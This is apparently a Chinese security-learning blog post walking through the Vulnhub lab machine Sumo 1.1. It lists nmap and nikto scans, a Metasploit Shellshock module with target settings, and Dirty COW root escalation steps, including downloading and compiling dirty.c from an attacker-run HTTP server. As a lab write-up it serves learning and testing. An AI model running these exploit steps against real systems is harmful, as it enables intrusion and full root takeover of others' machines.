往期博文:
[网络安全学习篇78]:Sumo: 1.1 Vulnhub 实战(脏牛漏洞提权)(本篇)
下期博文:
[网络安全学习篇79]:Geisha: 1 Vulnhub 实战
目录
网络扫描
arp-scan -l
nmap -A 192.168.1.174 -p-
nikto 扫描网站漏洞
nikto -h http://192.168.1.174
攻击
使用msf 查找此漏洞的攻击模块
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 192.168.1.174
set TARGETURI /cgi-bin/test
exploit
脏牛-提权
扫描是否存在脏牛漏洞脚本scan-dirtycow.sh
https://github.com/aishee/scan-dirtycow/blob/master/dirtycowscan.sh
exp:dirty.c
kali 本地开启http 服务
python -m SimpleHTTPServer
远程访问kali 并下载脚本文件,扫描,发现存在脏牛漏洞
chmod 777 scan-dirtycow.sh
./scan-dirtycow.sh
漏洞利用
远程下载exp,编译
chmod 777 dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
拿到flag
./dirty testpasswd
su firefart
testpasswd
参考博文: